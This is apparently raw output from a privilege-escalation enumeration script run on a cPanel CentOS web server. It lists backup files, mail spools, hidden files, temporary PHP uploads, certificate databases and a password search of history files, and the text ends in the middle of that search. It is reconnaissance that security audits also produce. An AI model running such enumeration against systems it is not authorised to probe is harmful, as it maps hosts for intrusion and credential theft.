/usr/bin/easy_install-2.7 2018-01-25+11:40:22.4244016450 /usr/bin/easy_install 2018-01-25+11:40:19.7994915530 /usr/bin/jupyter-trust 2018-01-20+12:53:36.9885552330 /usr/bin/wheel 2017-08-07+19:31:49.6558178500 /etc/profile.d/locallib.csh 2017-08-07+19:31:49.6537462880 /etc/profile.d/locallib.sh 2017-08-07+19:27:44.7829213770 /usr/bin/pyzor-migrate 2017-08-07+19:27:44.7819213670 /usr/bin/pyzor 2017-08-07+19:27:44.7789213370 /usr/bin/pyzord 2017-02-27+12:17:27.3103618960 /etc/cron.hourly/iops 2017-02-27+12:14:59.4523707090 /usr/local/nagios/libexec/check_mem 2017-02-07+13:04:03.6448554870 /etc/profile.d/os-security.sh 2017-02-03+10:48:55.3929140230 /etc/cron.daily/tmpwatch 2015-08-03+10:19:27.7951975170 /usr/local/nagios/libexec/check_tps 2015-08-03+10:19:27.7941975170 /usr/local/nagios/libexec/check_srvstate 2015-08-03+10:19:27.7931975170 /usr/local/nagios/libexec/check_load 2015-08-03+10:19:27.7921975170 /usr/local/nagios/libexec/check_disk 2015-08-03+10:14:30.2272184640 /usr/local/nagios/libexec/nagisk.pl 2015-08-03+10:14:30.2272184640 /usr/local/nagios/libexec/custom_check_procs 2015-08-03+10:14:30.2272184640 /usr/local/nagios/libexec/custom_check_mem 2015-08-03+10:14:30.2272184640 /usr/local/nagios/libexec/check_yum 2015-08-03+10:14:30.2272184640 /usr/local/nagios/libexec/check_sip 2015-08-03+10:14:30.2272184640 /usr/local/nagios/libexec/check_services 2015-08-03+10:14:30.2272184640 /usr/local/nagios/libexec/check_open_files.pl 2015-08-03+10:14:30.2272184640 /usr/local/nagios/libexec/check_netstat.pl 2015-08-03+10:14:30.2272184640 /usr/local/nagios/libexec/check_init_service 2015-08-03+10:14:30.2272184640 /usr/local/nagios/libexec/check_cpu_stats.sh 2015-08-03+10:14:30.2272184640 /usr/local/nagios/libexec/check_asterisk_sip_peers.sh 2015-08-03+10:14:30.2272184640 /usr/local/nagios/libexec/check_asterisk.pl 2015-08-03+10:14:30.2072184660 /usr/local/nagios/libexec/send_nsca 2015-08-03+10:14:30.2062184660 /usr/local/nagios/bin/nsca 2015-08-03+10:14:25.8042187760 /usr/local/nagios/bin/nrpe 2015-08-03+10:14:25.7992187760 /usr/local/nagios/libexec/check_nrpe 2015-08-03+10:14:21.0202191120 /usr/local/nagios/libexec/check_icmp 2015-08-03+10:14:21.0182191130 /usr/local/nagios/libexec/check_dhcp ╔══════════╣ Unexpected in /opt (usually empty) total 725016 -rw-rw---- 1 mysql mysql 449816376 Feb 22 2019 #sql_33a_0.MYD -rw-rw---- 1 mysql mysql 283947008 Feb 22 2019 #sql_33a_1.MYD drwxr-xr-x. 6 root root 4096 Oct 5 2024 . dr-xr-xr-x. 19 root root 4096 May 23 17:00 .. drwxr-xr-x 7 ctrlsadmin nagios 4096 Nov 25 2017 Archive-Zip-1.30 -rw------- 1 root root 197179 Jun 30 2009 Archive-Zip-1.30.tar.gz -rw-r--r-- 1 root root 8252398 Nov 12 2020 CitrixHypervisor-LinuxGuestTools-7.20.0-1.tar.gz drwxr-xr-x 4 chrony mysyslog 4096 May 19 2020 LinuxGuestTools-7.20.0-1 -rw------- 1 root root 156613 Sep 6 2014 atop-2.1-1.x86_64.rpm -rw-r--r-- 1 miisky miisky 13 Jul 4 2024 backup-7.4.2024_17-59-16_miisky -rw-r--r-- 1 miisky miisky 13 Jul 4 2024 backup-7.4.2024_17-59-16_miisky.tar.gz drwxr-xr-x 13 root root 4096 Sep 5 2018 cpanel -rw------- 1 root root 189 Feb 27 2017 ifcfg-ens192 -rw-r--r-- 1 root root 187 Aug 7 2017 ifcfg-ether drwxr-xr-x. 2 root root 6 Oct 31 2018 rh ╔══════════╣ Unexpected in root /vmware-tools-distrib /.autorelabel /razor-agent.log /quota.user /aquota.user /quota.group /aquota.group /.forward /scripts /backup ╔══════════╣ Modified interesting files in the last 5mins (limit 100) /etc/recent_recipient_mail_server_ips /tmp/phpPs9qCI /tmp/phpLE16lM /tmp/phpXWPD6I /tmp/php6srKsg /tmp/phpyLRMW8 /tmp/phpPjtE4e /var/log/sa/sa23 /var/log/exim_mainlog /var/log/cron /var/log/maillog /var/log/chkservd.log /var/log/zabbix/zabbix_agentd.log /var/log/messages /var/log/exim_rejectlog /var/spool/exim/db/retry /var/spool/exim/db/wait-dkim_remote_smtp /var/tmp/phpPs9qCI /var/tmp/phpLE16lM /var/tmp/phpXWPD6I /var/tmp/php6srKsg /var/tmp/phpyLRMW8 /var/tmp/phpPjtE4e /usr/tmpDSK logrotate 3.8.6 ╔══════════╣ Files inside /home/nobody (limit 20)  ╔══════════╣ Files inside others home (limit 20) /var/www/html/400.shtml /var/www/html/401.shtml /var/www/html/403.shtml /var/www/html/404.shtml /var/www/html/413.shtml /var/www/html/500.shtml /var/www/html/cp_errordocument.shtml /var/www/html/index.html /var/www/html/suspended.page/index.html /var/www/html/.well-known/pki-validation/51065C27A8C3FFD02217F83282EDE214.txt /var/www/html/.well-known/pki-validation/C5352B49F0027A4DEB6833D1F0AB9ECD.txt /var/www/html/.well-known/pki-validation/7F6BF68B9A61E06F127FA47C420F1AA3.txt /var/www/html/.well-known/pki-validation/0ACB14A369FB93863EC208B4914172AE.txt /var/www/html/.well-known/pki-validation/CD992C90A70B106A4C6C975109E26F24.txt /var/www/html/.well-known/pki-validation/F29E747DFD32220E94A41984A748B761.txt /var/www/html/.well-known/pki-validation/C36C8DD907A2A7AFB3C8F096217C19A0.txt /var/www/html/.well-known/pki-validation/E876F34D0778207D7ADD8F6EB19A5B97.txt /var/www/html/.well-known/pki-validation/B9E182CD5085D4C47EEC9E1F38DCB3B3.txt /var/www/html/.well-known/pki-validation/B5DE5306FAF688A71485F739351EDE6B.txt /var/www/html/.well-known/pki-validation/12E068CE2D3EEE3ACC7BDF72FC162710.txt grep: write error ╔══════════╣ Searching installed mail applications antivirus.exim dovecot dovecot-sysreport exim exim.conf exim.conf.dist exim.conf.local exim.conf.localopts exim.conf.mailman2.dist exim.conf.mailman2.exiscan.dist exim.crt exim.key exim.pl exim.pl.local sendmail ╔══════════╣ Mails (limit 50) 134372630 0 -rw-rw---- 1 nagios mail 0 Jun 19 2015 /var/mail/ctrl4c 134440004 0 -rw-rw---- 1 nagios mail 0 Aug 3 2015 /var/mail/nagios 134836318 0 -rw-rw---- 1 ctrlsadmin mail 0 Apr 18 2016 /var/mail/ctrlsadmin 134837634 0 -rw-rw---- 1 rpc mail 0 Aug 7 2017 /var/mail/rpc 134800565 0 -rw-rw---- 1 cloud4c mail 0 Feb 5 10:43 /var/mail/cloud4c 134372630 0 -rw-rw---- 1 nagios mail 0 Jun 19 2015 /var/spool/mail/ctrl4c 134440004 0 -rw-rw---- 1 nagios mail 0 Aug 3 2015 /var/spool/mail/nagios 134836318 0 -rw-rw---- 1 ctrlsadmin mail 0 Apr 18 2016 /var/spool/mail/ctrlsadmin 134837634 0 -rw-rw---- 1 rpc mail 0 Aug 7 2017 /var/spool/mail/rpc 134800565 0 -rw-rw---- 1 cloud4c mail 0 Feb 5 10:43 /var/spool/mail/cloud4c ╔══════════╣ Backup folders drwx------. 2 root root 19 Jun 2 2020 /etc/lvm/backup drwx--x--x 3 root root 38 Jul 28 2022 /usr/bin/backup drwxr-xr-x. 2 root root 26 Aug 6 2019 /usr/share/doc/subversion-1.7.14/backup total 12 -rwxr-xr-x 1 root root 11444 Apr 11 2018 hot-backup.py drwxr-xr-x 15 root root 4096 Jan 22 2021 /usr/share/mysql-test/suite/ndb/backups total 4 drwxr-xr-x 2 root root 4096 Feb 10 2021 50 drwxr-xr-x 2 root root 138 Feb 10 2021 51 drwxr-xr-x 2 root root 138 Feb 10 2021 51_d2_be drwxr-xr-x 2 root root 138 Feb 10 2021 51_d2_le drwxr-xr-x 2 root root 138 Feb 10 2021 51_data_be drwxr-xr-x 2 root root 138 Feb 10 2021 51_data_le drwxr-xr-x 2 root root 138 Feb 10 2021 51_dd drwxr-xr-x 2 root root 138 Feb 10 2021 51_undolog_be drwxr-xr-x 2 root root 138 Feb 10 2021 51_undolog_le drwxr-xr-x 2 root root 138 Feb 10 2021 before_native_default drwxr-xr-x 2 root root 27 Feb 10 2021 bug54613 drwxr-xr-x 2 root root 27 Feb 10 2021 hashmap drwxr-xr-x 2 root root 72 Feb 10 2021 packed ╔══════════╣ Backup files (limited 100) -rw-r--r-- 1 root root 255 May 23 17:21 /run/blkid/blkid.tab.old -rw-r--r-- 1 root root 1728 Feb 3 2017 /etc/nsswitch.conf.bak -rw-r--r-- 1 root root 138 Sep 15 2017 /etc/cpbackup-exclude.conf -rw-r--r-- 1 root root 38741 May 22 03:01 /var/log/dmesg.old -rwxr-xr-x 1 root root 18816 Sep 11 2014 /usr/bin/db47_hotbackup -rw-r--r-- 1 root root 8085 Oct 24 2016 /usr/lib/modules/3.10.0-327.36.3.el7.x86_64/kernel/drivers/net/team/team_mode_activebackup.ko -rw-r--r-- 1 root root 8085 May 25 2017 /usr/lib/modules/3.10.0-514.21.1.el7.x86_64/kernel/drivers/net/team/team_mode_activebackup.ko -rw-r--r-- 1 root root 8085 Jul 4 2017 /usr/lib/modules/3.10.0-514.26.2.el7.x86_64/kernel/drivers/net/team/team_mode_activebackup.ko -rw-r--r-- 1 root root 2288 Jul 29 2019 /usr/lib/modules/3.10.0-957.27.2.el7.x86_64/kernel/drivers/net/team/team_mode_activebackup.ko.xz -rw-r--r-- 1 root root 354 Dec 8 2018 /usr/lib/vmware-tools/configurator/pam.d/vmtoolsd.old.1 -rwxr-xr-x 1 root root 11444 Apr 11 2018 /usr/share/doc/subversion-1.7.14/backup/hot-backup.py -rw-r--r--. 1 root root 41508 Mar 10 2006 /usr/share/doc/pinfo-0.6.10/ChangeLog.old -rw-r--r--. 1 root root 10357 Sep 12 2013 /usr/share/doc/bash-completion-2.1/CHANGES.package.old -rw-r--r-- 1 root root 475 Aug 24 2018 /usr/share/doc/initscripts-9.49.46/examples/networking/ifcfg-bond-activebackup-arpmon -rw-r--r-- 1 root root 393 Aug 24 2018 /usr/share/doc/initscripts-9.49.46/examples/networking/ifcfg-bond-activebackup-miimon -rw-r--r-- 1 root root 305 Mar 17 2017 /usr/share/doc/teamd-1.27/example_configs/activebackup_arp_ping_1.conf -rw-r--r-- 1 root root 465 Mar 17 2017 /usr/share/doc/teamd-1.27/example_configs/activebackup_arp_ping_2.conf -rw-r--r-- 1 root root 194 Mar 17 2017 /usr/share/doc/teamd-1.27/example_configs/activebackup_ethtool_1.conf -rw-r--r-- 1 root root 212 Mar 17 2017 /usr/share/doc/teamd-1.27/example_configs/activebackup_ethtool_2.conf -rw-r--r-- 1 root root 241 Mar 17 2017 /usr/share/doc/teamd-1.27/example_configs/activebackup_ethtool_3.conf -rw-r--r-- 1 root root 447 Mar 17 2017 /usr/share/doc/teamd-1.27/example_configs/activebackup_multi_lw_1.conf -rw-r--r-- 1 root root 285 Mar 17 2017 /usr/share/doc/teamd-1.27/example_configs/activebackup_nsna_ping_1.conf -rw-r--r-- 1 root root 318 Mar 17 2017 /usr/share/doc/teamd-1.27/example_configs/activebackup_tipc.conf -rw-r--r-- 1 root root 1014 May 23 2015 /usr/share/augeas/lenses/dist/backuppchosts.aug -rw-r--r-- 1 root root 43 Aug 13 2024 /usr/share/man/man1/doveadm-backup.1.gz -rw-r--r-- 1 root root 2761 Apr 11 2018 /usr/share/man/man1/db_hotbackup.1.gz -r--r--r-- 1 root root 2796 Jul 3 2019 /usr/share/man/man8/vgcfgbackup.8.gz -rw-r--r-- 1 root root 405 Jan 5 2021 /usr/share/mysql-test/include/ndb_backup.inc -rw-r--r-- 1 root root 930 Jan 5 2021 /usr/share/mysql-test/include/ndb_backup_id.inc -rw-r--r-- 1 root root 459 Jan 5 2021 /usr/share/mysql-test/include/ndb_backup_print.inc -rw-r--r-- 1 root root 4396 Jan 5 2021 /usr/share/mysql-test/r/backup.result -rw-r--r-- 1 root root 1802 Jan 5 2021 /usr/share/mysql-test/suite/ndb/r/ndb_alter_table_backup.result -rw-r--r-- 1 root root 1563 Jan 5 2021 /usr/share/mysql-test/suite/ndb/t/ndb_alter_table_backup.test -rw-r--r-- 1 root root 1603 Jan 5 2021 /usr/share/mysql-test/suite/ndb_team/r/ndb_backup_print.result -rw-r--r-- 1 root root 24262 Jan 5 2021 /usr/share/mysql-test/suite/ndb_team/r/ndb_dd_backuprestore.result -rw-r--r-- 1 root root 1465 Jan 5 2021 /usr/share/mysql-test/suite/ndb_team/t/ndb_backup_print.test -rw-r--r-- 1 root root 9974 Jan 5 2021 /usr/share/mysql-test/suite/ndb_team/t/ndb_dd_backuprestore.test -rw-r--r-- 1 root root 603 Jun 10 2013 /usr/local/src/csf/cpanel/csf.conf.old -rw-r--r-- 1 501 501 5671 Jun 27 2018 /usr/local/src/Python-3.7.0/Lib/sqlite3/test/backup.py -rw-r--r-- 1 root root 5671 Jul 3 2019 /usr/local/python3.7.old/lib/python3.7/sqlite3/test/backup.py -rw-r--r-- 1 root root 5671 Jul 3 2019 /usr/local/python3.7/lib/python3.7/sqlite3/test/backup.py -rw-r--r-- 1 root root 5671 Jul 3 2019 /usr/local/python3.6/lib/python3.7/sqlite3/test/backup.py -rw-r--r-- 1 root root 0 Jun 20 2017 /usr/src/kernels/3.10.0-514.21.2.el7.x86_64/include/config/net/team/mode/activebackup.h -rw-r--r-- 1 root root 0 Jul 4 2017 /usr/src/kernels/3.10.0-514.26.2.el7.x86_64/include/config/net/team/mode/activebackup.h -rw-r--r-- 1 root root 0 Sep 13 2017 /usr/src/kernels/3.10.0-693.2.2.el7.x86_64/include/config/net/team/mode/activebackup.h -rw-r--r-- 1 root root 0 Oct 21 2017 /usr/src/kernels/3.10.0-693.5.2.el7.x86_64/include/config/net/team/mode/activebackup.h -rw-r--r-- 1 root root 0 Jul 29 2019 /usr/src/kernels/3.10.0-957.27.2.el7.x86_64/include/config/net/team/mode/activebackup.h -rw-r--r-- 1 miisky miisky 13 Jul 4 2024 /opt/backup-7.4.2024_17-59-16_miisky.tar.gz -rw-r--r-- 1 miisky miisky 13 Jul 4 2024 /opt/backup-7.4.2024_17-59-16_miisky -rwxr-xr-x. 1 root root 26440 Aug 23 2014 /vmware-tools-distrib/lib/plugins64/vmsvc/libvmbackup.so -rwxr-xr-x. 1 root root 21700 Aug 23 2014 /vmware-tools-distrib/lib/plugins32/vmsvc/libvmbackup.so ╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100) Found /etc/aliases.db: Berkeley DB (Hash, version 9, native byte-order) Found /etc/openldap/certs/cert8.db: Berkeley DB 1.85 (Hash, version 2, native byte-order) Found /etc/openldap/certs/key3.db: Berkeley DB 1.85 (Hash, version 2, native byte-order) Found /etc/openldap/certs/secmod.db: Berkeley DB 1.85 (Hash, version 2, native byte-order) Found /etc/pki/nssdb/cert8.db: Berkeley DB 1.85 (Hash, version 2, native byte-order) Found /etc/pki/nssdb/cert9.db: SQLite 3.x database Found /etc/pki/nssdb/key3.db: Berkeley DB 1.85 (Hash, version 2, native byte-order) Found /etc/pki/nssdb/key4.db: SQLite 3.x database Found /etc/pki/nssdb/secmod.db: Berkeley DB 1.85 (Hash, version 2, native byte-order) Found /var/lib/yum/history/history-2015-06-17.sqlite: regular file, no read permission Found /var/named/miisky.com.db: regular file, no read permission  -> Extracting tables from /etc/pki/nssdb/cert9.db (limit 20)  -> Extracting tables from /etc/pki/nssdb/key4.db (limit 20)  ╔══════════╣ Web files?(output limit) /var/www/: total 8.0K drwxr-xr-x. 4 root root 31 Jul 2 2019 . drwxr-xr-x. 24 root root 4.0K May 1 22:25 .. drwxr-xr-x. 2 root root 6 Jul 2 2019 cgi-bin drwxr-xr-x. 4 root root 4.0K Jul 2 2019 html /var/www/cgi-bin: total 0 drwxr-xr-x. 2 root root 6 Jul 2 2019 . ╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70) -rw-r--r-- 1 root root 171 Jul 29 2019 /boot/.vmlinuz-3.10.0-957.27.2.el7.x86_64.hmac -rw-r--r-- 1 root root 171 Jul 4 2017 /boot/.vmlinuz-3.10.0-514.26.2.el7.x86_64.hmac -rw-r--r-- 1 root root 171 Oct 24 2016 /boot/.vmlinuz-3.10.0-327.36.3.el7.x86_64.hmac -rw-r--r-- 1 root root 171 May 25 2017 /boot/.vmlinuz-3.10.0-514.21.1.el7.x86_64.hmac -rw-r--r-- 1 root root 0 May 23 03:01 /run/initramfs/.need_shutdown -rw-r--r-- 1 root root 129 Jul 29 2019 /etc/selinux/targeted/.policy.sha512 -rw-r--r-- 1 root root 18 Oct 30 2018 /etc/skel/.bash_logout -rw-r--r-- 1 root root 658 Oct 30 2018 /etc/skel/.zshrc -rw-------. 1 root root 0 Jun 17 2015 /etc/.pwd.lock -rw-r--r-- 1 root root 163 May 22 03:01 /etc/.updated -rw-r--r-- 1 root root 0 Jan 17 2022 /etc/.whostmgrft -rw-r--r--. 1 root root 0 Jun 17 2015 /var/lib/rpm/.rpm.lock -rw-r--r--. 1 root root 8267 Jun 10 2014 /var/lib/pear/.filemap -rw-r--r--. 1 root root 0 Jun 10 2014 /var/lib/pear/.lock -rw-r--r-- 1 root root 192 May 13 2018 /var/lib/spamassassin/compiled/5.024/3.004001/auto/Mail/SpamAssassin/CompiledRegexps/body_0/.packlist -rw-r--r-- 1 root root 192 Nov 7 2018 /var/lib/spamassassin/compiled/5.026/3.004001/auto/Mail/SpamAssassin/CompiledRegexps/body_0/.packlist -rw-r--r-- 1 root root 192 Mar 3 2019 /var/lib/spamassassin/compiled/5.026/3.004002/auto/Mail/SpamAssassin/CompiledRegexps/body_0/.packlist -rw-r--r-- 1 root root 192 Dec 17 2019 /var/lib/spamassassin/compiled/5.028/3.004002/auto/Mail/SpamAssassin/CompiledRegexps/body_0/.packlist -rw-r--r-- 1 root root 192 Mar 2 2020 /var/lib/spamassassin/compiled/5.028/3.004003/auto/Mail/SpamAssassin/CompiledRegexps/body_0/.packlist -rw-r--r-- 1 root root 192 Mar 10 2021 /var/lib/spamassassin/compiled/5.030/3.004004/auto/Mail/SpamAssassin/CompiledRegexps/body_0/.packlist -rw-r--r-- 1 root root 192 Feb 22 2023 /var/lib/spamassassin/compiled/5.032/3.004004/auto/Mail/SpamAssassin/CompiledRegexps/body_0/.packlist -rw-r--r-- 1 root root 210 Feb 22 2023 /var/lib/spamassassin/compiled/5.032/3.004004/auto/Mail/SpamAssassin/CompiledRegexps/body_neg2000/.packlist -rw-r--r-- 1 root root 192 May 22 22:27 /var/lib/spamassassin/compiled/5.036/3.004006/auto/Mail/SpamAssassin/CompiledRegexps/body_0/.packlist -rw-r--r-- 1 root root 210 May 22 22:28 /var/lib/spamassassin/compiled/5.036/3.004006/auto/Mail/SpamAssassin/CompiledRegexps/body_neg2000/.packlist -rw-r--r-- 1 root root 163 May 22 03:01 /var/.updated -rw-r--r-- 1 root root 65 Aug 2 2017 /usr/lib/.libgcrypt.so.11.hmac -rw-r--r-- 1 root root 2151 May 31 2019 /usr/lib64/perl5/auto/CPAN/.packlist -rw-r--r-- 1 root root 65 Aug 2 2017 /usr/lib64/.libgcrypt.so.11.hmac -rw-r--r-- 1 root root 65 Nov 6 2016 /usr/lib64/.libhogweed.so.2.5.hmac -rw-r--r-- 1 root root 65 Nov 6 2016 /usr/lib64/.libnettle.so.4.7.hmac -rw-r--r-- 1 root root 65 Mar 14 2019 /usr/lib64/.libgnutls.so.28.43.3.hmac -rw-r--r-- 1 root root 65 Mar 12 2019 /usr/lib64/.libcrypto.so.1.0.2k.hmac -rw-r--r-- 1 root root 65 Mar 12 2019 /usr/lib64/.libssl.so.1.0.2k.hmac -rw-r--r-- 1 root root 230 Jul 3 2019 /usr/share/doc/python-docs-2.7.5/html/.buildinfo -rw-r--r-- 1 root root 40 Oct 30 2018 /usr/share/man/man1/..1.gz -rw-r--r-- 1 root root 42 Jan 29 2019 /usr/share/man/man5/.k5identity.5.gz -rw-r--r-- 1 root root 2328 Apr 23 2013 /usr/share/kde4/apps/kdm/themes/CentOS7/.colorlsCZ1 -rw-r--r-- 1 root root 65 Jan 5 2021 /usr/share/mysql-test/std_data/.mylogin.cnf -rw-r--r-- 1 root root 137701 Jun 20 2017 /usr/src/kernels/3.10.0-514.21.2.el7.x86_64/.config -rw-r--r-- 1 root root 137701 Jul 4 2017 /usr/src/kernels/3.10.0-514.26.2.el7.x86_64/.config -rw-r--r-- 1 root root 140898 Sep 13 2017 /usr/src/kernels/3.10.0-693.2.2.el7.x86_64/.config -rw-r--r-- 1 root root 140898 Oct 21 2017 /usr/src/kernels/3.10.0-693.5.2.el7.x86_64/.config -rw-r--r-- 1 root root 151945 Jul 29 2019 /usr/src/kernels/3.10.0-957.27.2.el7.x86_64/.config -rw-r--r-- 1 root root 6961 Jul 24 2019 /opt/cpanel/ea-php56/root/usr/var/lib/pear/.filemap -rw-r--r-- 1 root root 0 Jul 24 2019 /opt/cpanel/ea-php56/root/usr/var/lib/pear/.lock -rw-r--r-- 1 root root 6961 Feb 27 2021 /opt/cpanel/ea-php70/root/usr/var/lib/pear/.filemap -rw-r--r-- 1 root root 0 Feb 27 2021 /opt/cpanel/ea-php70/root/usr/var/lib/pear/.lock -rw-r--r-- 1 root root 6961 Jul 24 2019 /opt/cpanel/ea-php55/root/usr/var/lib/pear/.filemap -rw-r--r-- 1 root root 0 Jul 24 2019 /opt/cpanel/ea-php55/root/usr/var/lib/pear/.lock -rw-r--r-- 1 root root 0 Jun 17 2015 /.autorelabel -rw------- 1 root root 26 Jan 11 2018 /.forward ╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70) grep: write error -rw------- 1 nobody nobody 3586011 May 19 09:39 /tmp/phpbs6cwD -rw------- 1 nobody nobody 2709780 May 16 20:50 /tmp/phpBUUXCY -rw------- 1 nobody nobody 1243917 May 21 17:51 /tmp/phpQ8WGxf -rw------- 1 nobody nobody 1945220 May 15 16:53 /tmp/phpifKjbd -rw------- 1 nobody nobody 114344 May 22 12:52 /tmp/php6mk5mU -rw------- 1 nobody nobody 1929863 May 21 15:24 /tmp/phpaYQxk2 -rw------- 1 nobody nobody 158689 May 20 15:29 /tmp/php4t3v0x -rw------- 1 nobody nobody 8057306 May 19 09:01 /tmp/phpygScOr -rw------- 1 nobody nobody 261069 May 20 12:50 /tmp/phpPjBiHL -rw------- 1 nobody nobody 701303 May 16 07:45 /tmp/phpLyci6a -rw------- 1 nobody nobody 265327 May 16 03:15 /tmp/phphJfJWk -rw------- 1 nobody nobody 143332 May 15 19:59 /tmp/php8ByYqS -rw------- 1 nobody nobody 947015 May 16 14:53 /tmp/phpD6i0Eh -rw------- 1 nobody nobody 1929863 May 23 10:44 /tmp/phpKPnnv2 -rw------- 1 nobody nobody 716660 May 13 08:03 /tmp/php8NO83J -rw------- 1 nobody nobody 1914506 May 15 20:29 /tmp/phpBokGzq -rw------- 1 nobody nobody 947015 May 16 14:53 /tmp/phpEtsGyw -rw------- 1 nobody nobody 291783 May 16 12:44 /tmp/phpusLVHI -rw------- 1 nobody nobody 670589 May 20 22:49 /tmp/php6uDGo9 -rw------- 1 nobody nobody 470948 May 19 11:11 /tmp/phpWXvngq -rw------- 1 nobody nobody 3439968 May 21 12:23 /tmp/php92h2q8 -rw------- 1 nobody nobody 1699508 May 19 21:57 /tmp/phpVcyIo2 -rw------- 1 nobody nobody 2866640 May 18 13:18 /tmp/phpfg4nD6 -rw------- 1 nobody nobody 5090400 May 14 10:17 /tmp/phpUjyGRK -rw------- 1 nobody nobody 5354474 May 21 18:16 /tmp/phpActg2M -rw------- 1 nobody nobody 112618 May 16 12:44 /tmp/php6Y0DQl -rw------- 1 nobody nobody 1305345 May 15 19:16 /tmp/phpgGZhRl -rw------- 1 nobody nobody 1929863 May 13 19:09 /tmp/phpJBKvzt -rw------- 1 nobody nobody 10401808 May 15 15:48 /tmp/phpb3y2hn -rw------- 1 nobody nobody 1914506 May 21 02:57 /tmp/phpx9a5UM -rw------- 1 nobody nobody 685946 May 18 21:48 /tmp/php7tSgrp -rw------- 1 nobody nobody 491424 May 14 10:20 /tmp/phpPSlmkO -rw------- 1 nobody nobody 2226765 May 20 22:49 /tmp/phpL19ioG -rw------- 1 nobody nobody 143332 May 18 12:32 /tmp/phpKokF2N -rw------- 1 nobody nobody 2781887 May 15 20:28 /tmp/phpsK5Go1 -rw------- 1 nobody nobody 962372 May 15 19:16 /tmp/phpHYi5Cj -rw------- 1 nobody nobody 1699508 May 16 14:54 /tmp/phpVAIOjd -rw------- 1 nobody nobody 3240327 May 22 12:23 /tmp/phpDEzxDi -rw------- 1 nobody nobody 5682250 May 13 12:23 /tmp/phpID43YG -rw------- 1 nobody nobody 491424 May 23 17:18 /tmp/phpPs9qCI -rw------- 1 nobody nobody 1929863 May 23 15:53 /tmp/phpRYtbld -rw------- 1 nobody nobody 1714865 May 14 23:22 /tmp/phppeYZdC -rw------- 1 nobody nobody 194522 May 13 10:32 /tmp/phpdCiH2W -rw------- 1 nobody nobody 1044276 May 18 01:03 /tmp/phptnUG04 -rw------- 1 nobody nobody 2093671 May 23 15:53 /tmp/phpzGa1FU -rw------- 1 nobody nobody 2474746 May 18 13:20 /tmp/phpooLbta -rw------- 1 nobody nobody 3583300 May 22 11:49 /tmp/phpcj1gTr -rw------- 1 nobody nobody 3450262 May 16 02:44 /tmp/phpxii165 -rw------- 1 nobody nobody 4028653 May 14 10:20 /tmp/php15H0ay -rw------- 1 nobody nobody 2418321 May 20 12:01 /tmp/phpKGqkey -rw------- 1 nobody nobody 322497 May 14 18:15 /tmp/phpdqlezJ -rw------- 1 nobody nobody 2702832 May 14 09:25 /tmp/phpSkMp9B -rw------- 1 nobody nobody 97261 May 23 17:18 /tmp/phpLE16lM -rw------- 1 nobody nobody 1504986 May 21 22:41 /tmp/php5M1hCR -rw------- 1 nobody nobody 5058750 May 19 12:32 /tmp/phpNxYqJX -rw------- 1 nobody nobody 179165 May 21 22:41 /tmp/phpdmun3N -rw------- 1 nobody nobody 6091610 May 17 10:27 /tmp/phpq0INqh -rw------- 1 nobody nobody 2843892 May 14 19:17 /tmp/phpLoiBh3 -rw------- 1 nobody nobody 4697323 May 19 08:47 /tmp/phpKs2y6X -rw------- 1 nobody nobody 1341178 May 18 21:48 /tmp/phpiBKk5F -rw------- 1 nobody nobody 998205 May 21 02:57 /tmp/phpj7N8bP -rw------- 1 nobody nobody 2503191 May 15 14:28 /tmp/phpUoYoOU -rw------- 1 nobody nobody 3194256 May 14 22:07 /tmp/phpjIGUSg -rw------- 1 nobody nobody 737136 May 14 19:25 /tmp/phpMbNgeQ -rw------- 1 nobody nobody 962372 May 14 23:21 /tmp/phpnBOQWL -rw------- 1 nobody nobody 849754 May 15 20:26 /tmp/php3IetBn -rw------- 1 nobody nobody 982848 May 21 12:07 /tmp/phplpD14j -rw------- 1 nobody nobody 112618 May 22 12:52 /tmp/phpxu3nYs -rw------- 1 nobody nobody 205337 May 15 14:59 /tmp/phpMl4Zs1 ╔══════════╣ Searching passwords in history files /usr/local/python3.6/lib/python3.7/idlelib/idle_test/test_history.py: @classmethod /usr/local/python3.6/lib/python3.7/idlelib/idle_test/test_history.py: @classmethod /usr/local/python3.6/lib/python3.7/idlelib/idle_test/test_history.py: cls.root = tk.Tk() /usr/local/python3.6/lib/python3.7/idlelib/idle_test/test_history.py: cls.root.withdraw() /usr/local/python3.6/lib/python3.7/idlelib/idle_test/test_history.py: self.text = text = TextWrapper(self.root) /usr/local/python3.6/lib/python3.7/idlelib/idle_test/test_history.py: @classmethod /usr/local/python3.6/lib/python3.7/idlelib/idle_test/test_history.py: cls.root.destroy() /usr/local/python3.6/lib/python3.7/idlelib/idle_test/test_history.py: del cls.root /usr/local/python3.7.old/lib/python3.7/idlelib/idle_test/test_history.py: @classmethod /usr/local/python3.7.old/lib/python3.7/idlelib/idle_test/test_history.py: @classmethod /usr/local/python3.7.old/lib/python3.7/idlelib/idle_test/test_history.py: cls.root = tk.Tk() /usr/local/python3.7.old/lib/python3.7/idlelib/idle_test/test_history.py: cls.root.withdraw() /usr/local/python3.7.old/lib/python3.7/idlelib/idle_test/test_history.py: self.text = text = TextWrapper(self.root) /usr/local/python3.7.old/lib/python3.7/idlelib/idle_test/test_history.py: @classmethod /usr/local/python3.7.old/lib/python3.7/idlelib/idle_test/test_history.py: cls.root.destroy() /usr/local/python3.7.old/lib/python3.7/idlelib/idle_test/test_history.py: del cls.root /usr/local/python3.7/lib/python3.7/idlelib/idle_test/test_history.py: @classmethod /usr/local/python3.7/lib/python3.7/idlelib/idle_test/test_history.py: @classmethod /usr/local/python3.7/lib/python3.7/idlelib/idle_test/test_history.py: cls.root = tk.Tk() /usr/local/python3.7/lib/python3.7/idlelib/idle_test/test_history.py: cls.root.withdraw() /usr/local/python3.7/lib/python3.7/idlelib/idle_test/test_history.py: self.text = text = TextWrapper(self.root) /usr/local/python3.7/lib/python3.7/idlelib/idle_test/test_history.py: @classmethod /usr/local/python3.7/lib/python3.7/idlelib/idle_test/test_history.py: cls.root.destroy() /usr/local/python3.7/lib/python3.7/idlelib/idle_test/test_history.py: del cls.root /usr/local/src/Python-3.7.0/Lib/idlelib/idle_test/test_history.py: @classmethod /usr/local/src/Python-3.7.0/Lib/idlelib/idle_test/test_history.py: @classmethod /usr/local/src/Python-3.7.0/Lib/idlelib/idle_test/test_history.py: cls.root = tk.Tk() /usr/local/src/Python-3.7.0/Lib/idlelib/idle_test/test_history.py: cls.root.withdraw() /usr/local/src/Python-3.7.0/Lib/idlelib/idle_test/test_history.py: self.text = text = 